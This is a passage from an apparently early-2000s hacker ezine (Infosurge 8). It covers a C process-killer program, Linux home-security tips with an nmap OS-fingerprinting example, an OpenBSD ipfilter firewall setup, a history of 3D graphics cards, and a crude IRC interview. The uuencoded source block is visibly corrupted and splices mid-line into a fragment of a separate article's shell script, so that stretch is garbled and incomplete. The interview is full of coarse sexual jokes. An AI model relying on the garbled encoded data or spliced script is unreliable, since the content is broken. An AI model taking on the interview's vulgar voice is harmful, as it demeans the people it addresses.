: /* kill the process */
:
: if (kill((pid_t) pid, KILL_SIG) == -1) {
: perror("kill() failed");
: }
: else {
: printf("Process has been killed\\n");
: ...
:
:
: 6) The obvious.
: ---------------
:
: As stated previously, the program should be wary of killing processes that
: have a UID of 0, because they are "root" owned processes which could be
: quite nasty if they were killed. Obviously, another if-condition could
: have been used to determine whether or not the process was below a certain
: UID to make sure all system processes are safe from this program. (e.g.
: those running as "bin", "news"" or whatever). This has been left as an
: exercise to the reader.
:
: Sysloging was achieved quite easily with syslog(), and was a miscellanous
: feature I thought of nearing the end of the program's construction.
:
: Portability is a problem, obviously, since only a system with a /proc
: filesystem could use this program.
:
: The TEST_ONLY option doesn't work, as I was too lazy to put in another
: #ifdef somewhere. :)
:
: There are many possible extensions to this program that wasn't made, such
: as keeping the state of the processes in memory to compare their PCPU
: based on a shorter time interval instead of their lifetime, which
: could have helped in calculating "surges" in CPU usage for logging or
: other reasons. But for reasons #1 and #2, this was not planned.
:
: Another fun extension would be to find out if the process has child
: processes, and kill them if they exceed a user-defined limit. This would
: allow it to kill off forkbombs, etc.
:
: Source
: ------
: The source "process_killer2.c.gz" is attached at the end of this textfile,
: so to output it to a file, use 'uudecode' and 'gzip' like this:
:
: uudecode infosurge-8.txt ; gzip -dc process_killer2.c.gz
:
: where "infosurge-8.txt" is the filename of this text file.
:
: Conclusion
: -----------
:
: "Keep it simple: as simple as possible, but no simpler."
: -- A. Einstein
:
: Whether you actually would use this program in the wild is up to you.
: Considering that I wrote this program in a few hours, you should probably
: take heed and look for bugs.
:
: As for whether or not the system administrator can pass the blame to the
: program for its actions... remains to be seen. :)
begin 664 process_killer2.c.gz
M'XL("`5Q.SH``W!R;V-ED<4*7+3T^LC2RU
MS=RYK\\]]48;'XD@DH&HDP"F8MB+<7+US?BY>5LP,_?1"HJQ+HHLK/A<+O=
M#E9).4CSU5"$:2YB4$I4E*Q$E.#[QBNB-!G0N=<7U]-GDS/Q-BW%QMN)-(EW
MHE02-T1*J#0LMEXN112*'79XJUSB4=J\\GZC,JWTSOD@.F-X68HHP2@+A"1\\R
MBC3D@YH;B;OH:Y2++<2,"CDP^ICJR];>G11)6HA<>D'S8)\\?$[?TE)4*Q81E
MCCVY\\)*`B/"64A4B@.8*(P_VKG)O([P"E_OVPJ<6CC!9(,
M4B9^NJ%=I,>T+'A?F,9QNL4*T?'30)Z1.89'1\\-C\\64@(;T4T\\73EU>3R>*7
MZ?6K!;2V@-9XSY=1XL$5AZM;+[IGM8@V\\G`UERHM@G1=Q>"J(<*FRO
MW4,R6B5>?"A`G&KIH=WGK%QEE&W_B'E1AJ'U$"\\NX!/U8^RNS#)_-9G-1'>X
MC)*A6G>9*%GQIK(S&SB1[PMX0V)C8!NI-3L>P@"!PG&=JNB]8)V7,7F'O)/D
MVVFY6M.9'*SX:Z*QX3!GST:XUIY"41V*Q>7%?/J/Q>75].)J>OUV,7_V:O+\\
M9C9]_5*8G6W^#GA[?D$!+;9>PNQYT.'N#TDA(0ASZ#0BH)3X646.4M"A\\R.>
M$N.TWE.-)_#_E4QD[L7`!8\\(+!&,42"]/M"A'1-+B5"@$U"1'+A:NDK;SR\\6
M8&WQ]/73V=M_3A97%_AR>77Q;#*?3^:5:-=K^-$ZC0-QY^61MXRE8I!",&(E
M+J4Z$PZL0OBT3+$LCMN/J^#.L9=%*PQR56(Z*MYEJ^
M47N-F?]V;_'-TQGRC8`',N:E6ZG(+:(TCXH=9P[#0NU]Y"G_(UO,D4L:IA6.
MMX0:7+YWDU+60;*J,/H5F+,Z^G$ZFVDI&>*74@#!O8)5[B5-(YN814`0D:9^
M$1\\XQZDXH(0`#^\\;NV\\EY1SR>#AC"6]<10A8]GX?]'W)+!(Q'4T-DDH610RK
MI]M$W$5>I;\\PRE4Q:)NJ%N*K$=O@&\\!#4A8:TUJ[C/%H$WX:-R/G\\[/R8/-\\
M^E)\\2UNC!`Z<4`;TH'R'LKIGG`9'3[\\1#K9>3ZY^TBKWCCJ=#O&;#[,T1CYF
MY6C;VQMF%R\\7=`O1!QB3UGB;%IX!NN$LUY/YM;AX/7LK3@Q>ZSQLS,+%1@56
MD+OH,U0!7.EP0`"VPWY`"[L/OEE5'R19NFK!5]77OY'Y,H74)]J=`EEX46S*
M#DMI*>F""O$"KHI0O?0"6EL"@VH6RT9FL%+TV..)AF7A@+DWDZL?+N83D_1#
M!OM[JX*C+V6>PQ9=JI^"*$AZA2FZ;&5BRJZZ-HNKFNN22T1=+AU6@M9G;6G3
M*`6[N#@)HK"52JM<.A5;B@+B)9=:`X%.K"3UO;GUAYL7L\\EK<3IZ_#4K0J4`
MU6>/'A$FW%&Z2!,%NG%T6RD/A_$,P1R1>G/XZ+DX'3?60B]6M#@:'U$50RJD
MY66:QN,VV\\SZ"X,\\2AQ_]`^L0<^YO1O'X6B.?@X:ILR0N<-L\\OV+%],7%WT!ZJXX/Q2R*/-$:Q;?/X`3LT0&&,,G\\."H`TZ2(G2Z$Z)V)E@!S6HGM*HF=Z32
MR+M#H%'Z'KQ+^*KV3<;7J];V^M8J5#(&M!`*Q*E"^%
M3GY<]@$0"[GI@X].V:HJ;=N@RS=X(M&J%`W>SL2#@$6F#U!BG[3`"^Z8882=
M@O5$%A]I@X/&[Y00*=1AE3XR60\\`K?LYH#\\2*!.P:/R'/$']2%I@#!M)2B9,3.D\\;HTVYJ:L(S>,G[V"I
M-%V2:DD2L:L8-V[[W[SA>7`S0+:XSG?TU21;RGO`P,&@\\CZFR@]/'H]:$6)#
MA)[JO?8Z+DVJ&WY9HT2XI5X6RM-F96^G-):728+K*7GMMM[N^^K6CGP?%$.]/Y;,DYAR9VJ;GERF3/_N'Y^>N;V4Q;.#3*0T,*Q>(^DC1.'/=,3"Y>
MB#!/-^)6[I:IEP<#S4>MI`^=&H#"<5M;1(/49!YK!5+7G+B\\\\RZ-D)/*(J6$
MYNN]SZ=7XAC]YM@"LVX^Q3%^U(ND>:&6E9HS%$L-U9><$?"3];-=IP*EG;+C
M!"XA'):+Z#@NUTN=RK0@$,8IZ(=$*J&VEN&A,#ZT*#/J-\\8:Z,P:=R#GW(@X
MI%K7>D!6?=)V7]"5^VYB'OF;@*Q7/V6$L6V5KOBHWEW%=2UD*B220*<_/:]2
MR/I)H/IVH4@++V8^48_+#;%%7Q;UD8)[IS&0+TC+)5V!4M6(F2U*?32#`/8#
M;3?/H6QR!5@+:D@S0EN$Z)!H=RO_YH?G@O732G9FOW:N*I:IG++EG*FK=`?'
M5`6409$2OH]_$
M$]$;]5SQUU]B_\\EWHO=MSW6)!KRK0./I%FN]L?FN+9+*-AF:=B+1PVV.W%_GE,-Z;L\\L/SH77S,LJ]LH$UU7S$57.-$`
MO1"*;WC)6BK`--4Y1%IR=M4-+1NM6%-WZ"D33-R$;C*!&*31`+4>D#^G\\4`B
ML(5Z2&Z?B4.:C:1;;5NEPS;C0J_3?1"(YM^N62U%\\V_W_KUV4>\\+NGVL/"2V
MX-8?_^^S-UGL?6C!]S^B9Y!:N^!>?B!DO[!8T$4F>CU!M4F/36L"PA%!817M0D^S9EK)3RI:E[%3RLRQE
MKJOM5$M/CQP]=G&UP-4,\\R,"\\P'W4,C&C3:]7>KKJ`P2SKON`_4..0+=&K_-
MBP+=8Z\\]F@&B-C.C8!ZTZ?=/MGYBQO:CH6QQBU*WJB"J&2GSHF>B#JW=S"=7
M?]$'_=(5(?Q_9M`4'<16PS<,UV9&V2B:#0=\\`3Z[X^I%`3H@^+)YF]NR:74T
M:QS-FD?MVXU@[X"&\\?J0_JX/ZAJ][EWV3JJ]DZJJW068_^LO+WY
MUJ=UA]E0G]_+`A4=/FDZH18!SAXT.3!LE"TRA>%&M-DQ\\WT^J]\\RZ7?S>ZKC
M_"3:.CA(799X\\QV5IO\\)TA3M(#H8A9HLOC;'7P0LG#GJ+L',]#9>E/`DS\\M7
M?E]/-8Z/\\>6.._.ZF[4#U_$]X4,IC(*'SJ%EZ/.CR^ES_8'"R1VS,U>.K7LO
M`+DL:;(DOK`UNAWJI,D)5>=#54(3D#BOQC>MWQ"H2MP&DO`O#J@U@3G_4@)-
M+:T[5QALSGTXJN&H(G&%`_I-@X%KE*5#8'%CD,H15<\\5;/_9'I".JEF9:=M.
MVQ*>#L3DO?1+E+O\\:GOIJ;7*83[$WFU+ZHC^OS=IYBY=QZA6]^R4+#44Z3
M:93'I);ZK3$/(>DW+-Q]ZE\\-Q"Q-LWM(Z[I=YZ@V-9-;TE+%NP."/P_$SV54
MM`W7J'%H<*2+&NC`7SL9'*G*6?2VI'?:.]-)@PLW9,=;1V<5/2&K.SW!*332
MQ4,CC1T8Z%2CEC*#T4T:2+N5>VBH-\\X<_OV#OC#_Z8ZZE?+JI*=/F&QG\\ET]
M.>/!E#25#=4?"``!*]$L/M]P:)OKN1)HI4J"!/H]#U%"Q[&1+XR22*UE+2#M
MH%FMKDANB-^1889Y64+3M^-:IX^-3AL#N?%]^[XR^PX&$/>> suid.txt
done
echo "View suid.txt for a list of services running as root"
echo "If you decide you don't need the file as root, use the following:"
echo "chmod o-x ; chgrp wheel "
:
: As I've mentioned in the Inet Daemons section, if you don't know what
: a program does, look it up.
:
: # Recommended Home Setup
: A) Make sure to choose the right operating system for you. I run
: Slackware 7.1. My next favourite Linux distribution is Debian 2.2.
:
: B) Firewall your box. If you're a console user, have a RO TTY designated
: for your messages log to be piped to. If you are an X hippie (like
: me), have a Virtual Desktop with you're log filtering program on it. I
: have Gnomes System Log utility running all the time, and checkup on it
: often. Also, 'man syslogd.conf', and see how you'd like syslogd setup.
:
: C) As I stated earlier, shutdown all of the INET daemons you can. If
: you rarely give SSH access to users, then activate it manually instead
: of having it running all the time. My personal preference is to have SSH
: installed, but have it disabled. If anybody requires access to my system
: I simply enable SSH and setup the TCP wrappers to only accept connections
: from their IP. (Writing a quick bash script to automate this process is
: a nice idea).
:
: SMTP, like I said earlier again, who needs it? You're a home user. Simply
: use a remote SMTP server from your ISP.
:
: Like alot of us, we are interested in Web development. Thus we need an
: httpd running. I use Apache + MySQL + PHP.
:
: So that's it. What does you're average home user required enabled to the
: outside world? Nothing. Unless of course you are a Web developer as I
: mentioned in the above paragraph. In this case you would require httpd
: and SQL running. No big deal.
:
: D) Go through all of those system processes in suid.txt and change the
: permissions and the group of the file.
:
: E) Patch your daemons and system services. Go to securityfocus.com, look
: for patches for the daemons you are running. Also checkout your OS's
: website. (eg. www.redhat.com or www.openbsd.org) for updated kernels, etc.
:
: F) Try running OpenBSD as a gateway machine. George (aphex) has written
: a text on how to setup an OpenBSD gateway in this infosurge issue (8).
:
: # Extra Ideas
:
: A) Conceal what OS you are running: The primary way a cracker will
: initiate to break your systems security is by running some Portscans.
: Usually they will use something like nmap -O xxx.xxx.xxx.xxx. The -O
: being an OS Fingerprint (which bases it's results on characteristics
: of the TCP/IP stack). Knowing what operating system is running on a
: targeted machine is more than likely the most valuable piece of
: information if you are planning to gain access to a system. Mainly
: because he/she can edit an exploits' shellcode depending on the remote
: operating system.
:
: It's possible to detect these Nmap scans using, since, for example,
: they'll often send packets set with odd combinations of TCP flags not
: often seen "in the wild". Depending on how the operating system
: responds, it is more often than not able to make an educated guess
: about what operating system is running. On Windows, BlackICE (a decent
: home firewall) has a feature to detect Nmap Fingerprints. Under Unix,
: Portsentry (mentioned above) and Snort (also mentioned above) readily
: detect most scans.
:
: As I was saying, quite some time ago Rendrag introduced me to a linux
: kernel patch which basically changes the way the OS replies to these TCP
: flags. Damien has this "stealth patch" built into his Linux kernel,
: running underneath Debian 2.2. It mainly blocks TCP RST packets, which
: slows down the scan and makes the ports timeout while waiting to
: receive a response. This way it makes -O particularly unreliable.
:
: The example of this: (Please don't nmap his box)
:
: # nmap -O vorlon.rendrag.net
: Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/ )
:
: /* Lets just skip the open ports */
:
: No OS matches for host (If you know what OS is running on it, see
: http://www.insecure.org/cgi-bin/nmap-submit.cgi).
:
: Dogcow from Wiretapped.net/2600.org.au has these files available at:
: http://the.wiretapped.net/security/operating-systems/stealth-kernel-patches/
:
: Another thing to try is to change the /etc/issue and /etc/issue.net files.
: These files basically have a banner for telnet (and when you initiate
: a new TTY), and by default has the operating system, kernel version,
: etc. So change this, or set it blank -- whatever! I like the program
: linux_logo, which makes a nice banner for your issue files. You can get
: it to show additional information, or no information at all about your
: system details. (Redhat users -- /etc/rc.d/rc.local and uncomment the
: lines which write over these files). Linux_Logo is available at linuxberg
: and also freshmeat.
:
: B) Write shell scripts to help you complete tasks: Writing your own
: scripts can help you do complex tasks quickly. The way I set them
: up is defining aliases to point to shell scripts. For example: alias
: killuser="/home/lymco/bash-files/killuser.sh", would be in my bash init
: file, (.bashrc or whatever you prefer). Not only does this method provide
: you with an automated process, it saves you time++.
:
: C) Subscribe to Mailing Lists A good proportion of my learnings have been
: gathered from mailing lists. They can introduce you to new computer
: aspects which you might of never thought of. You can get questions
: answered, or like me.. lurk in the background and learn from the posts.
:
: I recommend visiting securityfocus.com and/or insecure.org, checkout the
: mailing lists available. May I further note, it might be an idea to read
: through some recent archives of the mailing lists, just to make sure it's
: the right one for you. I'm signed up with several mailing lists, including
: 2600-AU, Bugtraq, Vuln-Dev, IDS, and Linux Kernel Security. All have been
: great, and have kept me "on the ball" with security issues on the internet.
:
: D) Learn from your own computer A good way to update your security is
: to try to crack it locally. That is, log on as a standard user and try
: to crack root. Not only do you update your learning of vulnerabilities,
: but also test your System Admin skills. Once you think it's _secure_
: ask a friend on IRC (one with skillz), to break your systems security. If
: he/she does, ask how they did it, and learn from them.
:
: E) Learn C I have not met a _GOOD_ "hacker" who is not a C guru. By knowing
: C inside out and back to front you understand how computers _really_
: work. You can look at some source code and say, "wait a minute that
: strcpy() function is looking a bit dodgy.", or what have you. Learn C,
: learn Assembly, learn how to code. It will get you a long way.
:
: F) The right Operating System No matter what people say, I still
: believe Redhat can be a secure server if it is in the hands of a good
: Admin. Debian is a good option as well. None the less OpenBSD > *, in
: regards to security. Even if you are a home user, it may be an idea to
: throw OBSD on a cheap box as your gateway.
:
: For a Linux workstation, tryout Debian 2.2 or Slackware 7.1.
:
: # Links
: http://infosurge.rendrag.net
: http://www.wiretapped.net
: http://www.2600.org.au
: http://www.freshmeat.net
: http://www.linuxberg.com
: http://www.securityfocus.com
:
: Hopefully the above information taught you something. It wasn't intended
: to be too full on, by the way. If you have any comments or questions,
: e-mail me at lym@thepentagon.com.
:
: "Over and out!",
:
: -- lymco http://dev.spanner.net
:
:....
:
...[ ]........................................................................
: :
: #07 Example configuration of an OpenBSD firewall - aphex :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: ->> intro
: The rules I use are rather slack, but more secure then 70%+ of the
: hosts out there. All this will work on the default install of openbsd
: 2.6 -> current. But if your machine is rather busy, you really should
: recompile the kernel with 'option NMBCLUSTERS=8192' otherwise you'll get
: errors like 'mb_map full' or the system might just hang. Other then that,
: there is no need to recompile your kernel to get this to work, GENERIC is
: fine. It is mainly designed you users with small home networks or small
: businesses, with dialup users in mind (sorry k, ikari).
:
: ->> ip forwarding
: IP Forwarding needs to be turned on. You can do this using sysctl, by
: typing 'sysctl -w net.inet.ip.forwarding=1' OR you can edit the file
: /etc/sysctl.conf by adding:
:
: net.inet.ip.forwarding=1
:
: ->> ipfilter, ipnat and ipmon ipf (ipfilter)
: ipfilter does just what its name suggests, it is a packet filter. To
: turn it on, simply:
:
: ipf -Fa -f /etc/ipf.rules -E
:
: This will flush the ruleset and enable the service. You should add
: 'ipfilter=YES' to rc.conf, to be started at boot. More on /etc/ipf.rules
: later. ipnat performs NAT. to turn it on:
:
: ipnat -CF -f /etc/ipnat.rules
:
: Which will also flush, and enable the service using the rules in
: /etc/ipnat.rules. Also add 'ipnat=YES' to rc.conf. Again, more on this
: later. And just for debugging preposes enable ipmon with:
:
: ipmon -Ds
:
: ->> /etc/ipf.rules
: The main advantage that ipf has over ipchains is the simplicity of the
: rules. Even if you know nothing about ipf, you can have a look at a
: large ruleset and half-understand it, of course at least half a brain
: is required. Heres an example:
:
: pass out from any to any
: pass in from any to any
:
: Now, not to state the obvious, but this roughly means 'allow any
: connection from any interface out through any other interface'. And
: 'allow in any connection on any interface into the machine'. You see
: this don't you? Well thats all there is to ipf. The rest is just options,
: changed and added lines to this default configuration. Well I lie, there
: really is quite alot of complex options and abit of skill required for
: hardcore configurations. But most of the people reading this don't have
: national security clearance or windows 2002 source code to protect, Yes
: I know you have ohday pron, but that doesn't count. Coming up is a
: decently secure configuration. Its fairly stock and has nothing too
: fancy, but it has some good examples in it:
:
: (Ed Note: "#" is used here as a comment in a configuration file rather
: than a command to be typed at a root prompt, as in other areas of IS 8)
:
# For reference:
# ne3 = ethernet to internal network
# tun0 = ppp interface to internet
# 192.168.0.* = internal network.
# IP filtering rules.
# loopback rules
pass out quick on lo0
pass in quick on lo0
# block tiny fragments
block in log quick proto tcp all with short
# drop source routed packets
block in log quick on tun0 all with opt lsrr
block in log quick on tun0 all with opt ssrr
# dont allow anyone to spoof non-routable addresses
block in quick on tun0 from 0.0.0.0/32 to any
block in quick on tun0 from 127.0.0.0/8 to any
block in quick on tun0 from 192.168.0.0/16 to any
block in quick on tun0 from 172.16.0.0/12 to any
block in quick on tun0 from 10.0.0.0/8 to any
block out quick on tun0 from any to 127.0.0.1/8
block out quick on tun0 from any to 192.168.0.0/16
block out quick on tun0 from any to 174.16.0.0/12
block out quick on tun0 from any to 10.0.0.0/8
# allow certain classes of ICMP
pass in quick on tun0 proto icmp all icmp-type 0
pass in quick on tun0 proto icmp all icmp-type 3
pass in quick on tun0 proto icmp all icmp-type 11
# allow all access from internal interface
pass in quick on ne3 192.168.0.0/16 to any
# allow outside access to http, ssh and mail
pass in quick on tun0 from any to an port = 80 flags S/SA
pass in quick on tun0 from any to any port = 22 flags S/SA
pass in quick on tun0 from any to any port = 25 flags S/SA
# allow DNS from my optus nameservers
pass in on tun0 proto udp from 203.2.75.2 port = 53 to any
pass in on tun0 proto udp from 203.2.75.12 port = 53 to any
# let outgoing traffic out
pass out quick on tun0 proto tcp from any to any flags S keep state
pass out quick on tun0 proto udp from any to any keep state
pass out quick on tun0 proto icmp from any to any keep state
# block all by default
block in log quick on tun0 any to any
# end ruleset
:
: If any packet doesn't fit into one of these rules, then it is dumped
: and logged. There are rules to politely reject connections etc, but
: dont bother. The 'log' option is handy for those why are paranoid out
: there. As you can see you can tell ipf alot of information. Which port,
: what protocol, what adress, etc.. Once thats all added to /etc/ipf.rules,
: restart ipf. You can check if your rules are inplace by typing:
:
: ipfstat -io
:
: Which will display the current active rules.
:
: ->> /etc/ipnat.rules
: This file is alot smaller then ipf.rules, merely because there is not
: much to configure.
:
# Reference:
# tun0 = ppp interface to internet
# 0/32 = if your ip is dynamic, otherwise put your ip here.
# 192.168.0.* = internal network
# ipnat ruleset
# port map
map tun0 192.168.0.0/24 -> 0/32 portmap tcp/udp 1025><65000
# handle ICMP, etc.
map tun0 192.168.0.0/24 -> 0/32
# This will make ipnat act as a proxy for active FTP sessions
map tun0 192.168.0.0/24 -> 0/32 proxy port ftp ftp/tcp
# end ruleset
:
: Here you see only 3 lines, one to map ports, one to handle all other
: things, and one for a transperent ftp proxy. I should also mention
: that if you want to redirect connection attempts because, for example,
: you host your small website off a server machine on your internal
: network add a derivative of the following line into /etc/ipnat.rules:
:
: rdr tun0 192.168.0.1 port 80 -> 192.168.1.2 port 8080
:
: Where 192.168.0.1 is the firewall, and 192.168.0.2 is the webserver.
: This will map port 80 on the external (tun0) interface on your
: firewall to port 8080 on the server located on your network at
: 192.168.1.2. The last thing that needs to be done is to run 'ipf -y'
: everytime you get allocated a new ip address. You can do this manualy
: OR by adding 'bg ipf -y' to your /etc/ppp/ppp.conf script /inside/ your
: settings for your ISP.
:
: ->> outro
: Thats all the basics you'll need to know. If you really want to protect
: your data go with the most secure setup.. unplug the computer from any
: network. Even z3r0c00l can't transmit packets over thin air. For the
: average user, this sort of setup will be good enough.
:
: -aphex -http://pulsewidth.net
:
:....
:
...[ ]........................................................................
: :
: #08 History of 3d acceleration - Maticles :
: ---------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
:
: 'llo - 'tis I Mat(icles if you prefer) - I used to common on #infosurge,
: but got bored, and now Damien has me looked up in his closet treating
: me like a monkey and has me writing a 'History of 3d acceleration'
: review. Woohoo. 3d cards primarily surfaced late 1995 with the advent
: of 3dfx's Voodoo. I must admit, professinal machines such as the Silicon
: Graphics Onyx did have 3d acceleration, but you'd be paying $15000 US
: for the privledge of owning such a card.
:
: About the first 3d comsumer accelerator - 3Dfx's 'Voodoo Graphics Chip'
:
: The first 3d accelerator came from the Silicon Valley start up company,
: 3Dfx Interactive, who developed the Voodoo based chip. The Voodoo
: generally had a hand blistering 4mb of onboard memory (Compared to 32mb
: and 64mb of todays standards) and had features such as accelerated MIP
: mapping and alpha transparencies. I bought such the beast in 1996 (or
: maybe it was 1997, I forget) for a whopping $210 which was expensive for
: a video card in those days, it was a yum-cha Atrend Helios. It allowed
: whooping detail on games such as Need For Speed 2:SE and GLQuake, both
: of which looked so err.. 'life like' it was scary. There were 'cool'
: things such as alpha-blended fog, fancy-dan textures and the whole thing
: just looked so schmick over its 2d variant.
:
: How the whole thing turned into a race.
:
: nVidia had just surfaced with its Riva 128, Rendition with its PowerVR,
: Matrox with the Mystique and a few other non-starters. This gave
: serious competition in the DirectX segment, but with 3Dfx Interactive
: holding the rights to glide, these chips didn't hold much of a chance,
: until Microsoft. Microsoft got its act together and released Direct3d,
: which was easier to code then glide, and it would run on alot more
: systems, seeing as all of the 3d accelerators were Direct3d compliant.
: THis got developers interested, so they started to code in Direct3d. (Some
: were cunning enough to do Direct3d and glide - glide was ALOT faster on
: voodoo then Direct3d on the voodoo) Things were going well for nVidia,
: Rendition and Matrox with their cards, finding a nice little place in
: the market. Then 3Dfx made a return.
:
: 3Dfx's next plan.
:
: 3Dfx released the Voodoo2 chipset, which was capable in running in SLI. A
: little more on SLI later. The power of 2 'Voodoo 2' was simply awesome to
: put it in 2 words. The frame rate was a astonishing 40fps at 640x480 in
: games such as Foresaken or Turok, this was simply unheard of in the past.
: Others chipset makers (nVidia, Matrox and newcomers to the 3D market, S3
: and ATi) created new cards also, but after 3Dfx has made a nice profit.
: Unfortunately Rendition basically stalled at the starting line, and failed
: to bring out a 3rd revision of PowerVR (2nd being PowerVR PCX2). S3 had
: just started with the Savage 3d and the Virge series. Virge really
: sucked in 3d, as did Savage 3d, so we won't speak about them much,
: as they weren't particully ground-breaking products. ATi released the
: rage which ended up being a massive success in OEM's and laptops because
: of their cheapness, and they were alright for 3d applications. All these
: cards on the markets from various companies started a 3d accelerator war,
: which meant new features came in place. Bit more after this...
:
: SLI
:
: SLI was 3Dfx's main feature in the Voodoo 2's. SLI means Scan Line
: Interleave which basically is 1 'Voodoo 2' card is doing 1 line, which
: the other is doing the line under, as such:
:
: ----^^^^^^-- <-- 'Voodoo 2' card number 1
: ----.----.-- <-- 'Voodoo 2' card number 2
: ------->---- <-- 'Voodoo 2' card number 1
: ------------ <-- 'Voodoo 2' card number 2
: ----\\____/-- <-- 'Voodoo 2' card number 1
:
: And so forth. This allowed the speed to be basically doubled.
:
: The after effects of the first 3D war.
:
: After this came nVidias TNT and TNT2, Matrox's G200 and 3Dfx's Voodoo3 as
: the major contenders. The Voodoo3 this time was alot worse then the TNT
: and TNT2 because it was being held back by 16-bit. Bad 3Dfx. Bad. 16-bit
: sucks, it looks washed out and grainy, believe me, get a TNT/2 or Geforce
: offering and see, much yumness in 32-bit indeed. This section is rather
: boring as its much the same as the first war, so I'll get to todays
: technologies.
:
: What yummy goodness we have today
:
: 3Dfx is dead. Yes, nVidia own them now, goto www.3dfx.com if you must.
: The Voodoo4/5 was released way after schedule, therefore it just didn't
: work. Geforce 2 Ultra are now out, although expensive. For the same
: price as a Voodoo5 you can get the Geforce2 Pro, which looks better in
: my opinion and has faster FPS. Shh you Voodoo people, noone cares about
: 'Full-Screen Anti-Aliasing' the Geforce 2 series (Not MX thou) can do
: it easily with a frame loss, but not enough for it to be jerky. Anyway,
: Voodoo 5 have the SLI technology also, with the Voodoo 5 board (Now being
: manufactured by 3Dfx's arm, STB [or something]), but even with this,
: it doesn't beat the Geforce 2. The Voodoo 4, meant to be in competition
: with the Geforce 2 MX, looks better competing ith a TNT 2 Ultra, it just
: can't keep up with the Geforce 2 MX. Whats so special about this Geforce
: I hear you ask? Well, the Geforce is so special because it has a GPU,
: Graphics Processing Unit, therefore the CPU doesn't have to do transform
: and lighting effects, this meants the CPU has more time for AI and other
: features. The Voodoo 5 doesn't have a GPU, .: it sucks. :)
:
: I'll name the variants on the Geforce series: (In order of release) Geforce
: 256 - nVidias first Geforce, sold alot. Geforce DDR - A Geforce 256,
: but has DDR (Double Data Rate) so it operates twice per ram clock-cycle.
: Geforce 2 GTS - Geforce 256, but with 4 pipelines for textures, DDR ram,
: fast core, it just means more yummyness! - oh, it also has the nVidia
: Shader Rasterizer which means shadows look even more shadowy! Woohoo!
: Geforce 2 MX - The 'home office' version of the Geforce 2 GTS, has slower
: SDRAM, but is still 33% faster then the Geforce 256. Geforce 2 Ultra -
: Man. This one rocks. The speed is simply awesome, 1600x1200, ABSOLUTLY
: everything high in Quake 3 with 4x FSAA, and its still not jerky. It
: rocks, trust me. Geforce 2 Pro - A Geforce 2 GTS, but with faster RAM.
: Geforce 2 Go! - The Geforce 2 GTS, but with some nifty power saving stuff
: so it can run in laptops without draining the battery in 0.39 seconds.
:
: ATi has made a comeback with the Radeon, which apparently (never seen one
: going) looks as good as a Geforce 2 and slightly slower, but still has
: better drivers etc. But still, I'm yet to see one actully going. I'll
: update this in Infosurge 9.
:
: Whats to come.
:
: Well, with 3Dfx gone, its up to nVidia and ATi. S3 are gone, they're now
: Sonic Blue, who do other - non-interesting stuff. Rendition are gone in my
: opinion. So, nVidia and ATi, lets have a look. nVidia is releasing the
: 'NV20' (only a codename) which is spectilated to be 7 times faster then
: the Geforce 2 Ultra, I don't believe it, and think its just a rumour,
: plus, its also rumoured to cost AU$1400, but nothing official is available
: on it. ATi is also making the Radeon 2 (spectilation again) with a core
: twice as fast as the current one. I'll post up what I heard in Infosurge 9.
:
: Oooh, Damien has brought me dinner, is that light? Yes! I see daylight,
: but it hurts my pail closet skin.
:
: Ta ta Folks, until next time.
:
:....
:
...[ ]........................................................................
: :
: #?? Interview with a vampi..... uhhh, irc loser - Fleabag :
: --------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Evening phase5, thank you for taking time out of your busy
: lifestyle of drinking alone and masturbating to let me interview you.
: im not taking time out
: im doing both those things
: as we speak
: Shall we get this baby rocking? Lets...
:
: How did you get into phreaking?
: umm
: when i was a kid
: possibly as soon as i was born
: my family bought
: or had previously owned a phone
: it grew from their i guess
:
: Have you ever had a homosexual experience?
: i thought we weren't going to go into this
: i dont give permission for my face to be on camera
: i want it blurred
: blurred
: !
:
: Have you ever patted a monkey?
: yes
: often
: I like monkeys.
: i like my monkey
: tho sometimes i have to beat it
: more and more often i have to beat my monkey
:
: Whats your favourite band?
: hmm... band
: that's a tough question
: Just answer it.
: i really like that royal crown revue band
: they make good music
: whenever im down i can listen to it
: and laugh my arse off at their shitness
: so the answer is red hot chili peppers
:
: Are you single? Uhhh, you don't have to bother answering that
: one....
: moving on...
:
: Do you think the au phreaking scene is dead?
: in a way
: there isn't really much new innovation
: im just in it for the groupie chicks
: Aren't we all?
: as you can tell, its working
:
: Favorite zine? (Besides infosurge?)
: umm
: let me think for a bit
: actually, i have to go for a piss
: back in a few
: Okay, I'm going to get another beer.
: Damn phase, does it always take you that long to piss?
: (Seriously, its been over 10 minutes)
: Maybe you should see a doctor?
: stfu
: umm.. no favourite really
: used to like um
: phrack, thtj, fk
: and the exploit-x issue 1
: was krad
: So I heard...
: and what do you mean 'other than infosurge'?
: i wouldnt say that trash is my favourite
: I'm asking the questions here.
:
: If you could be any member of the infosurge crew, who would you
: be?
: that phase5 guy
: he's cool
: other than that
: i'd be k
: he puts the k in krad
: We all want to be k.
:
: Current hardware setup?
: umm hardware
: this computer
: the other one next to it
: the 2 386's i hide alcohol in
: the p166 i hide alcohol in
: umm
: the 386 is called woody
: and it has a can of woodstock in it
: thats irony
: or something similar to that
: got a dumb terminal as well
: and a phone shaped like a football
:
: Who do you think I should interview next? And why?
: not lymco
: he's from perth
: all his answers will be
: 'yes i want to fuck my relatives'
: and
: 'no.. no electricity yet'
: Whos the most interesting person you've ever met online?
: and 'fuck cant talk now. uncle jed needs me to backhoe the lawn
: herm
: slow down
: with the questions
: stfu
: i like to rant
: I'll do what I want, and I'll fix it up all neat and shit.
: Rant away.
: ok
: pants
: why are they so important
: i dont wear them most of the time
: someone explain
: Are you quite done?
: for now
:
: Whos the most interesting person you've ever met online?
: umm, most interesting person
: i dont know
: your kind of a weirdo
: could be you
: coolest person i met online
: doesnt irc tho
: so that probably doesnt count
: I asked for a name. Not your life story.
: i'll come back to it later
: Okay..
:
: If you could be any type of smell, what would you be and why?
: umm
: you know the smell of nutsaq?
: not that
: something to pickup chicks
: so the smell of a stollie
:
: Favorite site?
: its a porn site
: so i'll give you second favourite
: i dont want everyone using its bandwidth
: oh shit, phone beeped
: wait up
: wtf
: thesefucks
: are messaging me
: calling me "jen"
: and saying we had a great night last night
: this is the second time
: in a week
: this has happened
: this is fucked
: Do you really think the people reading IS care?
: thats not the fucking point
: Just answer my questions and crawl back into your hole.
: what was the question again?
: oh
: www.theonion.com
:
: If you could be a chick for one day, whats the first thing you
: would do?
: are you stealing questions
: from picturepoll.com
: thats fucking sad
: what kind of bullshit interview is this
: No. I am not.
: Answer the fucking question.
: if i was a chick for a day
